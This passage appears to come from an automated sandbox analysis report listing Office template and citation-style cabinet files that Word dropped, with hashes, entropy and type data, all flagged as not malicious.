                                                                                                                                                SHA-256:1CF5C2D0F6188FFFF117932C424CC55D1459E0852564C09D7779263ABD116118
                                                                                                                                                SHA-512:ACE9718D724B51FE04B900CE1D2075C0C05C80243EA68D4731A63138F3A1287776E80BD67ECB14C323C69AA1796E9D8774A3611FE835BA3CA891270DE1E7FD1F
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4313 bytes, 2 files, at 0x44 "chevronaccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20457
                                                                                                                                                Entropy (8bit):7.612540359660869
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:KyeISBuydn5rpmp77G8E0GftpBjE/kFLrHRN7ngslI66YVj:KHISBvd5rpmFG8Pi6/6nK666j
                                                                                                                                                MD5:4EFA48EC307EAF2F9B346A073C67FCFB
                                                                                                                                                SHA1:76A7E1234FF29A2B18C968F89082A14C9C851A43
                                                                                                                                                SHA-256:3EE9AE1F8DAB4C498BD561D8FCC66D83E58F11B7BB4B2776DF99F4CDA4B850C2
                                                                                                                                                SHA-512:2705644D501D85A821E96732776F61641FE82820FD6A39FFAF54A45AD126C886DC36C1398CDBDBB5FE282D9B09D27F9BFE7F26A646F926DA55DFF28E61FBD696
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 3144 bytes, 2 files, at 0x44 "VaryingWidthList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):19288
                                                                                                                                                Entropy (8bit):7.570850633867256
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:5ZII4Hf+7G8E0GftpBjCwBFLrHRN7bcClvQyUTL2mH:pG8PicgbcAvU+mH
                                                                                                                                                MD5:B9A6FF715719EE9DE16421AB983CA745
                                                                                                                                                SHA1:6B3F68B224020CD4BF142D7EDAAEC6B471870358
                                                                                                                                                SHA-256:E3BE3F1E341C0FA5E9CB79E2739CF0565C6EA6C189EA3E53ACF04320459A7070
                                                                                                                                                SHA-512:062A765AC4602DB64D0504B79BE7380C14C143091A09F98A5E03E18747B2166BD862CE7EF55403D27B54CEB397D95BFAE3195C15D5516786FEBDAC6CD5FBF9CD
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14864 bytes, 2 files, at 0x4c "mlaseventheditionofficeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31008
                                                                                                                                                Entropy (8bit):7.806058951525675
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ktH7oN/HbwiV+M+4Jc+5UrT3czi5uOHQA8Pi6DxUR/WTZIy:87sPEANXJc+eTMsuzP7DmN0ZIy
                                                                                                                                                MD5:E033CCBC7BA787A2F824CE0952E57D44
                                                                                                                                                SHA1:EEEA573BEA217878CD9E47D7EA94E56BDAFFE22A
                                                                                                                                                SHA-256:D250EB1F93B43EFB7654B831B4183C9CAEC2D12D4EFEE8607FEE70B9FAB20730
                                                                                                                                                SHA-512:B807B024B32E7F975AED408B77563A6B47865EECE32E8BA993502D9874B56580ECC9D9A3FEFA057FDD36FB8D519B6E184DB0593A65CC0ACF5E4ACCBEDE0F9417
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6450 bytes, 2 files, at 0x44 "ThemePictureAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22594
                                                                                                                                                Entropy (8bit):7.674816892242868
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:L7d2l8FbHaaIKbtv1gDISi8E0GftpBjEZRFLrHRN74bUll7PK/pd:LUlCIOt/8Pi6Zv4bMId
                                                                                                                                                MD5:EE0129C7CC1AC92BBC3D6CB0F653FCAE
                                                                                                                                                SHA1:4ABAA858176B349BDAB826A7C5F9F00AC5499580
                                                                                                                                                SHA-256:345AA5CA2496F975B7E33C182D5E57377F8B740F23E9A55F4B2B446723947B72
                                                                                                                                                SHA-512:CDDABE701C8CBA5BD5D131ABB85F9241212967CE6924E34B9D78D6F43D76A8DE017E28302FF13CE800456AD6D1B5B8FFD8891A66E5BE0C1E74CF19DF9A7AD959
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 9170 bytes, 2 files, at 0x44 "InterconnectedBlockProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):25314
                                                                                                                                                Entropy (8bit):7.729848360340861
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:75V23GNhfG/YvmBqWDP7G8E0GftpBjEB1vrFLrHRN7mKll7PK/pRU0:LS/Yvc7TG8Pi6BLm6IS0
                                                                                                                                                MD5:C47E3430AF813DF8B02E1CB4829DD94B
                                                                                                                                                SHA1:35F1F1A18AA4FD2336A4EA9C6005DBE70013C7FC
                                                                                                                                                SHA-256:F2DB1E60533F0D108D5FB1004904C1F2E8557D4493F3B251A1B3055F8F1507A3
                                                                                                                                                SHA-512:6F8904E658EB7D04C6880F7CC3EC63FCFE31EF2C3A768F4ECF40B115314F23774DAEE66DCE9C55FAF0AD31075A3AC27C8967FD341C23C953CA28BDC120997287
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4091 bytes, 2 files, at 0x44 "BracketList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20235
                                                                                                                                                Entropy (8bit):7.61176626859621
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:j3W3yGyjgbA8E0GftpBjEHvFLrHRN7pDAlI66Yv1:j3WFyAA8Pi6HVpDZ66c1
                                                                                                                                                MD5:E3C64173B2F4AA7AB72E1396A9514BD8
                                                                                                                                                SHA1:774E52F7E74B90E6A520359840B0CA54B3085D88
                                                                                                                                                SHA-256:16C08547239E5B969041AB201EB55A3E30EAD400433E926257331CB945DFF094
                                                                                                                                                SHA-512:7ED618578C6517ED967FB3521FD4DBED9CDFB7F7982B2B8437804786833207D246E4FCD7B85A669C305BE3B823832D2628105F01E2CF30B494172A17FC48576D
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 7453 bytes, 2 files, at 0x44 "pictureorgchart.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):23597
                                                                                                                                                Entropy (8bit):7.692965575678876
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:y6aR//q0bJi/Uj+957G8E0GftpBj/4YOFLrHRN7LxhKll7PK/ph:y6I/Li/UjmVG8PiZ4YsLxh6Ih
                                                                                                                                                MD5:7C645EC505982FE529D0E5035B378FFC
                                                                                                                                                SHA1:1488ED81B350938D68A47C7F0BCE8D91FB1673E2
                                                                                                                                                SHA-256:298FD9DADF0ACEBB2AA058A09EEBFAE15E5D1C5A8982DEE6669C63FB6119A13D
                                                                                                                                                SHA-512:9F410DA5DB24B0B72E7774B4CF4398EDF0D361B9A79FBE2736A1DDD770AFE280877F5B430E0D26147CCA0524A54EA8B41F88B771F3598C2744A7803237B314B2
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5864 bytes, 2 files, at 0x44 "architecture.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22008
                                                                                                                                                Entropy (8bit):7.662386258803613
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:M7FUtfIdqSHQs7G8E0GftpBjED/C4RQrFLrHRN7TT8DlvQyUTL2mH:sWgdqR2G8Pi6D6YQZTTMvU+mH
                                                                                                                                                MD5:ABBF10CEE9480E41D81277E9538F98CB
                                                                                                                                                SHA1:F4EA53D180C95E78CC1DA88CD63F4C099BF0512C
                                                                                                                                                SHA-256:557E0714D5536070131E7E7CDD18F0EF23FE6FB12381040812D022EC0FEE7957
                                                                                                                                                SHA-512:9430DAACF3CA67A18813ECD842BE80155FD2DE0D55B7CD16560F4AAEFDA781C3E4B714D850D367259CAAB28A3BF841A5CB42140B19CFE04AC3C23C358CA87FFB
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4967 bytes, 2 files, at 0x44 "TabList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21111
                                                                                                                                                Entropy (8bit):7.6297992466897675
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:wWZsOvbMZGgbA8E0GftpBjEtnFLrHRN7Dfll7PK/pirk:xZRvuzA8Pi6t9DPISk
                                                                                                                                                MD5:D30AD26DBB6DECA4FDD294F48EDAD55D
                                                                                                                                                SHA1:CA767A1B6AF72CF170C9E10438F61797E0F2E8CE
                                                                                                                                                SHA-256:6B1633DD765A11E7ED26F8F9A4DD45023B3E4ADB903C934DF3917D07A3856BFF
                                                                                                                                                SHA-512:7B519F5D82BA0DA3B2EFFAD3029C7CAB63905D534F3CF1F7EA3446C42FA2130665CA7569A105C18289D65FA955C5624009C1D571E8960D2B7C52E0D8B42BE457
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15461 bytes, 2 files, at 0x4c "gostname.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31605
                                                                                                                                                Entropy (8bit):7.820497014278096
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:7SpOUxgQ9gFodHZktfHa2TSmcAg76j8/xorK0JoZgbA8E0GftpBjE2PzFLrHRN7S:OngHltf7Bcp/xoB3A8Pi625D8RA54
                                                                                                                                                MD5:69EDB3BF81C99FE8A94BBA03408C5AE1
                                                                                                                                                SHA1:1AC85B369A976F35244BEEFA9C06787055C869C1
                                                                                                                                                SHA-256:CEBE759BC4509700E3D23C6A5DF8D889132A60EBC92260A74947EAA1089E2789
                                                                                                                                                SHA-512:BEA70229A21FBA3FD6D47A3DC5BECBA3EAA0335C08D486FAB808344BFAA2F7B24DD9A14A0F070E13A42BE45DE3FF54D32CF38B43192996D20DF4176964E81A53
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5647 bytes, 2 files, at 0x44 "RadialPictureList.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21791
                                                                                                                                                Entropy (8bit):7.65837691872985
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:PWew5RNDcvPgbA8E0GftpBjE0hsyaFLrHRN7BD9lI66YR:P3GRNDcEA8Pi60hsyABDo66g
                                                                                                                                                MD5:7BF88B3CA20EB71ED453A3361908E010
                                                                                                                                                SHA1:F75F86557051160507397F653D7768836E3B5655
                                                                                                                                                SHA-256:E555A610A61DB4F45A29A7FB196A9726C25772594252AD534453E69F05345283
                                                                                                                                                SHA-512:2C3DFB0F8913D1D8FF95A55E1A1FD58CE1F9D034268CD7BC0D2BF2DCEFEA8EF05DD62B9AFDE1F983CACADD0529538381632ADFE7195EAC19CE4143414C44DBE3
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15691 bytes, 2 files, at 0x4c "gb.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31835
                                                                                                                                                Entropy (8bit):7.81952379746457
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:ltJDH8NmUekomvNufaqA8Pi6x5q3KQIGu:lvINukgzP7x5mRIGu
                                                                                                                                                MD5:92A819D434A8AAEA2C65F0CC2F33BB3A
                                                                                                                                                SHA1:85C3F1801EFFEA1EA10A8429B0875FC30893F2C8
                                                                                                                                                SHA-256:5D13F9907AC381D19F0A7552FD6D9FC07C9BD42C0F9CE017FFF75587E1890375
                                                                                                                                                SHA-512:01339E04130E08573DF7DBDFE25D82ED1D248B8D127BB90D536ECF4A26F5554E793E51E1A1800F61790738CC386121E443E942544246C60E47E25756F0C810A3
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 12767 bytes, 2 files, at 0x4c "ieee2006officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):28911
                                                                                                                                                Entropy (8bit):7.7784119983764715
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:WnJY165YD0tPYoCKa3HueqRyzVscLk1Yj2GjcgbA8E0GftpBjE2kWTpjFLrHRN7N:X4rtPzCK6uRoljXBA8Pi62ZphL0HRA5p
                                                                                                                                                MD5:6D787B1E223DB6B91B69238062CCA872
                                                                                                                                                SHA1:A02F3D847D1F8973E854B89D4558413EA2E349F7
                                                                                                                                                SHA-256:DA2F261C3C82E229A097A9302C8580F014BB6442825DB47C008DA097CFCE0EE4
                                                                                                                                                SHA-512:9856D88D5C63CD6EBCF26E5D7521F194FA6B6E7BF55DD2E0238457A1B760EB8FB0D573A6E85E819BF8E5BE596537E99BC8C2DCE7EC6E2809A43490CACCD44169
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15327 bytes, 2 files, at 0x4c "sist02.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31471
                                                                                                                                                Entropy (8bit):7.818389271364328
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:eNtFWk68dbr2QxbM971RqpzAA8Pi6TlHaGRA5yr:eNtEkpGSbuHAkP7TlHaGq54
                                                                                                                                                MD5:91AADBEC4171CFA8292B618492F5EF34
                                                                                                                                                SHA1:A47DEB62A21056376DD8F862E1300F1E7DC69D1D
                                                                                                                                                SHA-256:7E1A90CDB2BA7F03ABCB4687F0931858BF57E13552E0E4E54EC69A27325011EA
                                                                                                                                                SHA-512:1978280C699F7F739CD9F6A81F2B665643BD0BE42CE815D22528F0D57C5A646FC30AAE517D4A0A374EFB8BD3C53EB9B3D129660503A82BA065679BBBB39BD8D5
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 4410 bytes, 2 files, at 0x44 "PictureFrame.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):20554
                                                                                                                                                Entropy (8bit):7.612044504501488
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:zEAH676iPi8+IS5iqn7G8E0GftpBjExDxIHFLrHRN7Ke/ll7PK/pGaz6:zEhG8+ISrG8Pi6xDxCKoIGaz6
                                                                                                                                                MD5:486CBCB223B873132FFAF4B8AD0AD044
                                                                                                                                                SHA1:B0EC82CD986C2AB5A51C577644DE32CFE9B12F92
                                                                                                                                                SHA-256:B217393FD2F95A11E2C594E736067870212E3C5242A212D6F9539450E8684616
                                                                                                                                                SHA-512:69A48BF2B1DB64348C63FC0A50B4807FB9F0175215E306E60252FFFD792B1300128E8E847A81A0E24757B5F999875DA9E662C0F0D178071DB4F9E78239109060
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15338 bytes, 2 files, at 0x4c "gosttitle.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 8 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31482
                                                                                                                                                Entropy (8bit):7.808057272318224
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:LgHv7aLOcoLGQ4EykdrHwLa+A8Pi6Iv8ACIa:LwvWyx4EykdTwLaWP7I0ACIa
                                                                                                                                                MD5:F10DF902980F1D5BEEA96B2C668408A7
                                                                                                                                                SHA1:92D341581B9E24284B7C29E5623F8028DBBAAFE9
                                                                                                                                                SHA-256:E0100320A4F63E07C77138A89EA24A1CBD69784A89FE3BF83E35576114B4CE02
                                                                                                                                                SHA-512:00A8FBCD17D791289AC8F12DC3C404B0AFD240278492DF74D2C5F37609B11D91A26D737BE95D3FE01CDBC25EEDC6DA0C2D63A2CCC4AB208D6E054014083365FB
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 16689 bytes, 2 files, at 0x4c "iso690.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):32833
                                                                                                                                                Entropy (8bit):7.825460303519308
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:+0TU06CkaUYMoi//YX428RaFA8Pi6e9iA4I3w:vICTm/QorUpP7eAA4I3w
                                                                                                                                                MD5:205AF51604EF96EF1E8E60212541F742
                                                                                                                                                SHA1:D436FE689F8EF51FBA898454CF509DDB049C1545
                                                                                                                                                SHA-256:DF3FFF163924D08517B41455F2D06788BA4E49C68337D15ECF329BE48CF7DA2D
                                                                                                                                                SHA-512:BCBA80ED0E36F7ABC1AEF19E6FF6EB654B9E91268E79CA8F421CB8ADD6C2B0268AD6C45E6CC06652F59235084ECDA3BA2851A38E6BCD1A0387EB3420C6EC94AC
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 5731 bytes, 2 files, at 0x44 "ThemePictureAlternatingAccent.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):21875
                                                                                                                                                Entropy (8bit):7.6559132103953305
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:k73HRpZA6B3ulrnxtRT7G8E0GftpBjEdHqlFLrHRN7uhFlvQyUTL2m4c:k7XRgIkrG8Pi6dmuNvU+mp
                                                                                                                                                MD5:E532038762503FFA1371DF03FA2E222D
                                                                                                                                                SHA1:F343B559AE21DAEF06CBCD8B2B3695DE1B1A46F0
                                                                                                                                                SHA-256:5C70DD1551EB8B9B13EFAFEEAF70F08B307E110CAEE75AD9908A6A42BBCCB07E
                                                                                                                                                SHA-512:E0712B481F1991256A01C3D02ED56645F61AA46EB5DE47E5D64D5ECD20052CDA0EE7D38208B5EE982971CCA59F2717B7CAE4DFCF235B779215E7613AA5DCD976
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14813 bytes, 2 files, at 0x4c "iso690nmerical.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 7 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):30957
                                                                                                                                                Entropy (8bit):7.808231503692675
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:rKfgT03jNkAFbgUQWtxq9OGh1bBkd/1MVHb5iVOdMgbA8E0GftpBjEl8tFLrHRNF:r303jOrUQAkfhopWHbA8Pi6l8zuUIq
                                                                                                                                                MD5:D3C9036E4E1159E832B1B4D2E9D42BF0
                                                                                                                                                SHA1:966E04B7A8016D7FDAFE2C611957F6E946FAB1B9
                                                                                                                                                SHA-256:434576EB1A16C2D14D666A33EDDE76717C896D79F45DF56742AFD90ACB9F21CE
                                                                                                                                                SHA-512:D28D7F467F072985BCFCC6449AD16D528D531EB81912D4C3D956CF8936F96D474B18E7992B16D6834E9D2782470D193A17598CAB55A7F9EB0824BC3F069216B6
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 18672 bytes, 2 files, at 0x4c "APASixthEditionOfficeOnline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):34816
                                                                                                                                                Entropy (8bit):7.840826397575377
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:i3R9VYnIYfPYmqX0CnF1SRHVnLG8Pi61YbEIFO:ih9VjYfPYlk+F1SJxP71YbEIFO
                                                                                                                                                MD5:62863124CDCDA135ECC0E722782CB888
                                                                                                                                                SHA1:2543B8A9D3B2304BB73D2ADBEC60DB040B732055
                                                                                                                                                SHA-256:23CCFB7206A8F77A13080998EC6EF95B59B3C3E12B72B2D2AD4E53B0B26BB8C3
                                                                                                                                                SHA-512:2734D1119DC14B7DFB417F217867EF8CE8E73D69C332587278C0896B91247A40C289426A1A53F1796CCB42190001273D35525FCEA8BA2932A69A581972A1EF00
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 6196 bytes, 2 files, at 0x44 "ThemePictureGrid.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):22340
                                                                                                                                                Entropy (8bit):7.668619892503165
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:GByvLdFHny7G8E0GftpBjE8upFLrHRN778lvQyUTL2mm2y:Oy3HkG8Pi6887mvU+ma
                                                                                                                                                MD5:8B29FAB506FD65C21C9CD6FE6BBBC146
                                                                                                                                                SHA1:CE1B8A57BB3C682F6A0AFC32955DAFD360720FDF
                                                                                                                                                SHA-256:773AC516C9B9B28058128EC9BE099F817F3F90211AC70DC68077599929683D6F
                                                                                                                                                SHA-512:AFA82CCBC0AEF9FAE4E728E4212E9C6EB2396D7330CCBE57F8979377D336B4DACF4F3BF835D04ABCEBCDB824B9A9147B4A7B5F12B8ADDADF42AB2C34A7450ADE
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 19375 bytes, 2 files, at 0x4c "turabian.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 11 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):35519
                                                                                                                                                Entropy (8bit):7.846686335981972
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:2LFougzHaUdBKUsM+Z56zBjA8Pi6bo+ld8IX:MFodzHaULR9P7bo+l6IX
                                                                                                                                                MD5:53EE9DA49D0B84357038ECF376838D2E
                                                                                                                                                SHA1:AB03F46783B2227F312187DD84DC0C517510DE20
                                                                                                                                                SHA-256:9E46B8BA0BAD6E534AF33015C86396C33C5088D3AE5389217A5E90BA68252374
                                                                                                                                                SHA-512:751300C76ECE4901801B1F9F51EACA7A758D5D4E6507E227558AAAAF8E547C3D59FA56153FEA96B6B2D7EB08C7AF2E4D5568ACE7E798D1A86CEDE363EFBECF7C
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 10800 bytes, 2 files, at 0x44 "ConvergingText.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):26944
                                                                                                                                                Entropy (8bit):7.7574645319832225
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:sbUX16g8/atF4NB3TJOvqeMRD/8svIZj/OwgbA8E0GftpBjEYwFLrHRN7mYll7PY:sbhg8yY4nMZK2hA8Pi6Yum4IVR
                                                                                                                                                MD5:F913DD84915753042D856CEC4E5DABA5
                                                                                                                                                SHA1:FB1E423C8D09388C3F0B6D44364D94D786E8CF53
                                                                                                                                                SHA-256:AA03AFB681A76C86C1BD8902EE2BBA31A644841CE6BCB913C8B5032713265578
                                                                                                                                                SHA-512:C48850522C809B18208403B3E721ABEB1187F954045CE2F8C48522368171CC8FAF5F30FA44F6762AFDE130EC72284BB2E74097A35FE61F056656A27F9413C6B6
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 15418 bytes, 2 files, at 0x4c "harvardanglia2008officeonline.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 9 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):31562
                                                                                                                                                Entropy (8bit):7.81640835713744
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:384:yhsBScEWkrljntbzuMmWh7ezPnGgbA8E0GftpBjohgsRFLrHRN7ybll7PK/p:MsBScwtnBmWNeTzA8PiuWsvyDI
                                                                                                                                                MD5:1D6F8E73A0662A48D332090A4C8C898F
                                                                                                                                                SHA1:CF9AD4F157772F5EDC0FDDEEFD9B05958B67549C
                                                                                                                                                SHA-256:8077C92C66D15D7E03FBFF3A48BD9576B80F698A36A44316EABA81EE8043B673
                                                                                                                                                SHA-512:5C03A99ECD747FBC7A15F082DF08C0D26383DB781E1F70771D4970E354A962294CE11BE53BECAAD6746AB127C5B194A93B7E1B139C12E6E45423B3A509D771FC
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 17466 bytes, 2 files, at 0x4c "chicago.xsl", iFolder 0x1 "Content.inf", 2 cffolders, flags 0x4, number 1, extra bytes 20 in head, 10 datablocks, 0x1203 compression
                                                                                                                                                Category:dropped
                                                                                                                                                Size (bytes):33610
                                                                                                                                                Entropy (8bit):7.8340762758330476
                                                                                                                                                Encrypted:false
                                                                                                                                                SSDEEP:768:IlFYcxiahedKSDNAPk5WEEfA8Pi6xnOKMRA58:2JitdKsNAM5WBDP7xOKMq58
                                                                                                                                                MD5:51804E255C573176039F4D5B55C12AB2
                                                                                                                                                SHA1:A4822E5072B858A7CCA7DE948CAA7D2268F1BB4B
                                                                                                                                                SHA-256:3C6F66790C543D4E9D8E0E6F476B1ACADF0A5FCDD561B8484D8DDDADFDF8134B
                                                                                                                                                SHA-512:2AC8B1E433C9283377B725A03AE72374663FEC81ABBA4C049B80409819BB9613E135FCD640ED433701795BDF4D5822461D76A06859C4084E7BAE216D771BB091
                                                                                                                                                Malicious:false
                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                                                File Type:Microsoft Cabinet archive data, many, 14939 bytes, 2 files, at 0x44 "CircleProcess.glox" "Content.inf", flags 0x4, number 1, extra bytes 20 in head, 1 datablock, 0x1203 compression
                                                                                                                                                Category:dropped
